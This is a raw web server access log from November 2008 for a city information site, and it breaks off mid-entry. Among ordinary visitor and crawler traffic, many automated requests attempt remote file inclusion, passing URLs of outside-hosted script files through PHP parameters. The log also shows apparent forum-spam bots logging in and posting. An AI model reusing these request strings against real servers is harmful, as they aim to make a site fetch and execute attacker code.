89.149.254.185 - - [15/Nov/2008:05:25:04 -0800] "GET /logs//?custompluginfile[]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 73598 "-" "libwww-perl/5.813" "www.sancarloscity.org"
89.149.254.185 - - [15/Nov/2008:05:25:08 -0800] "GET /logs/access_080918.log//?custompluginfile[]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 760 "-" "libwww-perl/5.813" "www.sancarloscity.org"
195.113.173.139 - - [15/Nov/2008:05:25:17 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 774 "-" "libwww-perl/5.805" "www.sancarloscity.org"
195.113.173.139 - - [15/Nov/2008:05:25:17 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 779 "-" "libwww-perl/5.805" "www.sancarloscity.org"
195.113.173.139 - - [15/Nov/2008:05:25:17 -0800] "GET /logs/access_081003.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 797 "-" "libwww-perl/5.805" "www.sancarloscity.org"
195.113.173.139 - - [15/Nov/2008:05:25:18 -0800] "GET /logs/access_081009.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 797 "-" "libwww-perl/5.805" "www.sancarloscity.org"
78.157.143.211 - - [15/Nov/2008:05:25:18 -0800] "POST /jodera2/profile.php HTTP/1.0" 200 11325 "http://www.sancarloscity.org/jodera2/profile.php?mode=editprofile" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:25:23 -0800] "GET /logs/access_081006.log//?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:25:24 -0800] "GET /?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 200 44225 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:25:25 -0800] "GET /logs//?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 200 73598 "-" "libwww-perl/5.805" "www.sancarloscity.org"
78.157.143.211 - - [15/Nov/2008:05:25:47 -0800] "GET /jodera2/index.php HTTP/1.0" 200 55149 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
82.99.30.6 - - [15/Nov/2008:05:25:47 -0800] "GET /jodera2/search.php?sid=948cfc92bb367b95e3e83a52452d8918 HTTP/1.0" 200 24425 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
208.111.154.16 - - [15/Nov/2008:05:25:52 -0800] "GET /picgallery/displayimage.php?album=lastup&cat=10&pos=4 HTTP/1.1" 200 10088 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
203.114.112.155 - - [15/Nov/2008:05:25:56 -0800] "GET /logs/access_081013.log/errors.php?error=http://www.keoeeit.com/go/arab.txt? HTTP/1.1" 404 769 "-" "libwww-perl/5.803" "www.sancarloscity.org"
85.214.37.182 - - [15/Nov/2008:05:25:59 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.talkit.biz/components/bot.txt?? HTTP/1.1" 404 766 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
85.214.37.182 - - [15/Nov/2008:05:26:00 -0800] "GET /skin/zero_vote/error.php?dir=http://www.talkit.biz/components/bot.txt?? HTTP/1.1" 404 760 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
203.114.112.155 - - [15/Nov/2008:05:26:01 -0800] "GET /errors.php?error=http://www.keoeeit.com/go/arab.txt? HTTP/1.1" 404 759 "-" "libwww-perl/5.803" "www.sancarloscity.org"
208.111.154.15 - - [15/Nov/2008:05:26:02 -0800] "GET /picgallery/displayimage.php?album=random&cat=4&pos=-376 HTTP/1.1" 200 9983 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
203.114.112.155 - - [15/Nov/2008:05:26:06 -0800] "GET /logs/errors.php?error=http://www.keoeeit.com/go/arab.txt? HTTP/1.1" 404 764 "-" "libwww-perl/5.803" "www.sancarloscity.org"
78.157.143.211 - - [15/Nov/2008:05:26:07 -0800] "GET /jodera2/posting.php?mode=reply&t=30755 HTTP/1.0" 200 743774 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:26:41 -0800] "GET /logs/access_081006.log//?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:26:41 -0800] "GET /?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 200 44225 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:26:42 -0800] "GET /logs//?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 200 73598 "-" "libwww-perl/5.805" "www.sancarloscity.org"
78.157.143.211 - - [15/Nov/2008:05:27:01 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11450 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=30755" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
84.16.231.171 - - [15/Nov/2008:05:27:08 -0800] "GET /jodera2/posting.php?mode=reply&t=32691 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32691" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.sancarloscity.org"
89.149.241.165 - - [15/Nov/2008:05:27:08 -0800] "GET /jodera2/posting.php?mode=reply&t=32692 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32692" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "www.sancarloscity.org"
84.16.231.171 - - [15/Nov/2008:05:27:09 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=32691&sid=d89aed2dba82e2b0a86d20325b9c311c HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32691&sid=d89aed2dba82e2b0a86d20325b9c311c" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.sancarloscity.org"
89.149.241.165 - - [15/Nov/2008:05:27:09 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=32692&sid=8c2785aba39efe0463f8fb2b8caf4856 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32692&sid=8c2785aba39efe0463f8fb2b8caf4856" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "www.sancarloscity.org"
89.149.241.165 - - [15/Nov/2008:05:27:10 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32692&sid=8c2785aba39efe0463f8fb2b8caf4856" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "www.sancarloscity.org"
89.149.241.165 - - [15/Nov/2008:05:27:11 -0800] "GET /jodera2/posting.php?mode=reply&t=32692&sid=8c2785aba39efe0463f8fb2b8caf4856 HTTP/1.0" 200 50516 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32692&sid=8c2785aba39efe0463f8fb2b8caf4856" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "www.sancarloscity.org"
84.16.231.171 - - [15/Nov/2008:05:27:11 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32691&sid=d89aed2dba82e2b0a86d20325b9c311c" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.sancarloscity.org"
84.16.231.171 - - [15/Nov/2008:05:27:11 -0800] "GET /jodera2/posting.php?mode=reply&t=32691&sid=d89aed2dba82e2b0a86d20325b9c311c HTTP/1.0" 200 50529 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32691&sid=d89aed2dba82e2b0a86d20325b9c311c" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:27:12 -0800] "GET /logs/access_080918.log//?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
78.157.143.211 - - [15/Nov/2008:05:27:28 -0800] "GET /jodera2/viewtopic.php?p=42470 HTTP/1.0" 200 709235 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:44 -0800] "GET /listings/listing/review.php?listing_id=14812 HTTP/1.1" 200 21535 "http://search.yahoo.com/search?ei=utf-8&fr=slv8-ca&p=rd%20pawnshop&type=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:45 -0800] "GET /listings/layout/general_structure.css HTTP/1.1" 200 28444 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:45 -0800] "GET /favicon.ico HTTP/1.1" 404 739 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:46 -0800] "GET /listings/layout/general_noimage.css HTTP/1.1" 200 89 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:50 -0800] "GET /listings/layout/listing_result.css HTTP/1.1" 200 12330 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:51 -0800] "GET /listings/layout/listing_color.css HTTP/1.1" 200 4496 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:52 -0800] "GET /listings/layout/color/white_blue.css HTTP/1.1" 200 24170 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.sancarloscity.org"
89.149.241.165 - - [15/Nov/2008:05:27:53 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32692&sid=8c2785aba39efe0463f8fb2b8caf4856" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "www.sancarloscity.org"
84.16.231.171 - - [15/Nov/2008:05:27:53 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32691&sid=d89aed2dba82e2b0a86d20325b9c311c" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:54 -0800] "GET /listings/scripts/common.js HTTP/1.1" 200 5162 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:55 -0800] "GET /listings/scripts/location.js HTTP/1.1" 200 4102 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:56 -0800] "GET /listings/scripts/menusearch.js HTTP/1.1" 200 614 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:57 -0800] "GET /listings/scripts/contactclick.js HTTP/1.1" 200 1110 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:57 -0800] "GET /listings/scripts/cookies.js HTTP/1.1" 200 2224 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:58 -0800] "GET /listings/upload/image_files/photo_78.gif HTTP/1.1" 200 15262 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:58 -0800] "GET /listings/images/color/white_blue/img_logo.gif HTTP/1.1" 200 18765 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:58 -0800] "GET /listings/images/color/white_blue/bt_addlisting.gif HTTP/1.1" 200 2991 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:58 -0800] "GET /listings/images/design/bg_businessButton.gif HTTP/1.1" 200 168 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:59 -0800] "GET /listings/images/content/bullet_viewQuickList.gif HTTP/1.1" 200 431 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:59 -0800] "GET /listings/images/design/bullet_headerLogin.gif HTTP/1.1" 200 57 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:27:59 -0800] "GET /listings/images/design/bg_navbar_businessOn.gif HTTP/1.1" 200 43 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:28:00 -0800] "GET /listings/images/design/img_rateSmallStarOff.gif HTTP/1.1" 200 607 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:28:00 -0800] "GET /listings/images/design/img_rateStar.gif HTTP/1.1" 200 576 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:28:00 -0800] "GET /listings/upload/image_files/photo_77.gif HTTP/1.1" 200 41828 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "sancarloscity.org"
122.144.113.218 - - [15/Nov/2008:05:28:00 -0800] "GET /listings/upload/image_files/photo_119.jpg HTTP/1.1" 200 19617 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14812" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "sancarloscity.org"
82.99.30.55 - - [15/Nov/2008:05:28:10 -0800] "GET /jodera2/memberlist.php?sid=948cfc92bb367b95e3e83a52452d8918 HTTP/1.0" 200 80951 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:28:10 -0800] "GET /jodera2/viewtopic.php?p=42384&sid=7431e3628cfadf89490b0ce0d9e6f2ff HTTP/1.1" 200 38169 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:28:15 -0800] "GET /logs/access_080918.log//?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
81.122.81.86 - - [15/Nov/2008:05:28:15 -0800] "GET /logs/access_080921.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 777 "-" "libwww-perl/5.76" "www.sancarloscity.org"
81.122.81.86 - - [15/Nov/2008:05:28:16 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 772 "-" "libwww-perl/5.76" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:28:18 -0800] "GET /jodera2/viewforum.php?f=1&sid=2964c014d702224397d9e46165b839f2 HTTP/1.1" 200 95580 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
208.111.154.16 - - [15/Nov/2008:05:28:19 -0800] "GET /picgallery/displayimage.php?album=lastup&cat=14&pos=5 HTTP/1.1" 200 10072 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:28:19 -0800] "GET /jodera2/groupcp.php?sid=11662b16d75c5a67c16699e76792f4bb HTTP/1.1" 200 17512 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:05:28:24 -0800] "GET /logs/access_071001.log HTTP/1.0" 200 3838224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
78.157.143.212 - - [15/Nov/2008:05:29:05 -0800] "GET /jodera2/login.php HTTP/1.0" 200 13249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.sancarloscity.org"
78.157.143.212 - - [15/Nov/2008:05:29:07 -0800] "POST /jodera2/login.php?sid=a99d5ee12893989b81f849e745b39ba9 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.sancarloscity.org"
78.157.143.212 - - [15/Nov/2008:05:29:21 -0800] "GET /jodera2/index.php?sid=a99d5ee12893989b81f849e745b39ba9 HTTP/1.0" 200 55243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.sancarloscity.org"
78.157.143.212 - - [15/Nov/2008:05:29:22 -0800] "GET /jodera2/profile.php?mode=editprofile HTTP/1.0" 200 34886 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.sancarloscity.org"
78.157.143.212 - - [15/Nov/2008:05:29:23 -0800] "GET /jodera2/index.php HTTP/1.0" 200 55243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.sancarloscity.org"
78.157.143.212 - - [15/Nov/2008:05:29:24 -0800] "GET /jodera2/index.php HTTP/1.0" 200 55243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.sancarloscity.org"
78.157.143.212 - - [15/Nov/2008:05:29:25 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41372 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.sancarloscity.org"
89.218.85.18 - - [15/Nov/2008:05:29:50 -0800] "GET /logs/access_081006.log//?custompluginfile[]=http://www.tsw.ru/ips.txt??? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [15/Nov/2008:05:29:52 -0800] "GET /logs/access_081006.log//?custompluginfile[]=http://www.tsw.ru/ips.txt??? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [15/Nov/2008:05:29:55 -0800] "GET /?custompluginfile[]=http://www.tsw.ru/ips.txt??? HTTP/1.1" 200 44225 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [15/Nov/2008:05:29:56 -0800] "GET /?custompluginfile[]=http://www.tsw.ru/ips.txt??? HTTP/1.1" 200 44225 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [15/Nov/2008:05:29:56 -0800] "GET /logs/access_081006.log//?custompluginfile[]=http://www.tsw.ru/ips.txt??? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [15/Nov/2008:05:29:57 -0800] "GET /?custompluginfile[]=http://www.tsw.ru/ips.txt??? HTTP/1.1" 200 44225 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [15/Nov/2008:05:29:57 -0800] "GET /logs/access_081006.log//?custompluginfile[]=http://www.tsw.ru/ips.txt??? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [15/Nov/2008:05:30:01 -0800] "GET /logs//?custompluginfile[]=http://www.tsw.ru/ips.txt??? HTTP/1.1" 200 73598 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [15/Nov/2008:05:30:03 -0800] "GET /logs//?custompluginfile[]=http://www.tsw.ru/ips.txt??? HTTP/1.1" 200 73598 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [15/Nov/2008:05:30:06 -0800] "GET /logs//?custompluginfile[]=http://www.tsw.ru/ips.txt??? HTTP/1.1" 200 73598 "-" "libwww-perl/5.805" "www.sancarloscity.org"
195.98.246.153 - - [15/Nov/2008:05:30:08 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 774 "-" "libwww-perl/5.65" "www.sancarloscity.org"
195.98.246.153 - - [15/Nov/2008:05:30:08 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 779 "-" "libwww-perl/5.65" "www.sancarloscity.org"
200.5.113.180 - - [15/Nov/2008:05:30:10 -0800] "GET /logs/access_080119.log HTTP/1.1" 200 2999883 "http://guide.opendns.com/controller.php?url=http.%2F%2F200.5.113.180%3A1026&ref=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" "www.sancarloscity.org"
89.218.85.18 - - [15/Nov/2008:05:30:10 -0800] "GET /logs//?custompluginfile[]=http://www.tsw.ru/ips.txt??? HTTP/1.1" 200 73598 "-" "libwww-perl/5.805" "www.sancarloscity.org"
195.98.246.153 - - [15/Nov/2008:05:30:14 -0800] "GET /logs/access_081003.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 797 "-" "libwww-perl/5.65" "www.sancarloscity.org"
208.111.154.15 - - [15/Nov/2008:05:30:19 -0800] "GET /gettingaround.htm HTTP/1.1" 200 20762 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
195.98.246.153 - - [15/Nov/2008:05:30:43 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 779 "-" "libwww-perl/5.65" "www.sancarloscity.org"
195.98.246.153 - - [15/Nov/2008:05:30:43 -0800] "GET /logs/access_081003.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 797 "-" "libwww-perl/5.65" "www.sancarloscity.org"
195.98.246.153 - - [15/Nov/2008:05:30:43 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 774 "-" "libwww-perl/5.65" "www.sancarloscity.org"
200.5.113.180 - - [15/Nov/2008:05:31:32 -0800] "GET / HTTP/1.1" 200 44225 "http://guide.opendns.com/controller.php?url=http.%2F%2F200.5.113.180%3A1026&ref=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" "www.sancarloscity.org"
200.5.113.180 - - [15/Nov/2008:05:31:33 -0800] "GET /antenna.css HTTP/1.1" 200 1748 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" "www.sancarloscity.org"
200.5.113.180 - - [15/Nov/2008:05:31:33 -0800] "GET /autoactivate.js HTTP/1.1" 200 5474 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" "www.sancarloscity.org"
200.5.113.180 - - [15/Nov/2008:05:31:34 -0800] "GET /sccirtpan1.jpg HTTP/1.1" 200 25068 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" "sancarloscity.org"
200.5.113.180 - - [15/Nov/2008:05:31:36 -0800] "GET /sampo/ HTTP/1.1" 200 2268 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" "sancarloscity.org"
200.5.113.180 - - [15/Nov/2008:05:31:36 -0800] "GET /frontbanner.swf HTTP/1.1" 200 547694 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" "www.sancarloscity.org"
200.5.113.180 - - [15/Nov/2008:05:31:37 -0800] "GET /background_scci_top.jpg HTTP/1.1" 200 69602 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" "sancarloscity.org"
200.5.113.180 - - [15/Nov/2008:05:31:37 -0800] "GET /sampo/AC_RunActiveContent.js HTTP/1.1" 200 8029 "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" "sancarloscity.org"
200.5.113.180 - - [15/Nov/2008:05:31:39 -0800] "GET /sampo/Multichannel.swf HTTP/1.1" 200 70433 "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" "sancarloscity.org"
200.5.113.180 - - [15/Nov/2008:05:31:42 -0800] "GET /bg_red_aurora.jpg HTTP/1.1" 200 32099 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" "sancarloscity.org"
200.5.113.180 - - [15/Nov/2008:05:31:48 -0800] "GET /bg_glass_bottomleft3.jpg HTTP/1.1" 200 18715 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" "sancarloscity.org"
200.5.113.180 - - [15/Nov/2008:05:31:49 -0800] "GET /sampo/xml/Dateline.xml HTTP/1.1" 200 78423 "h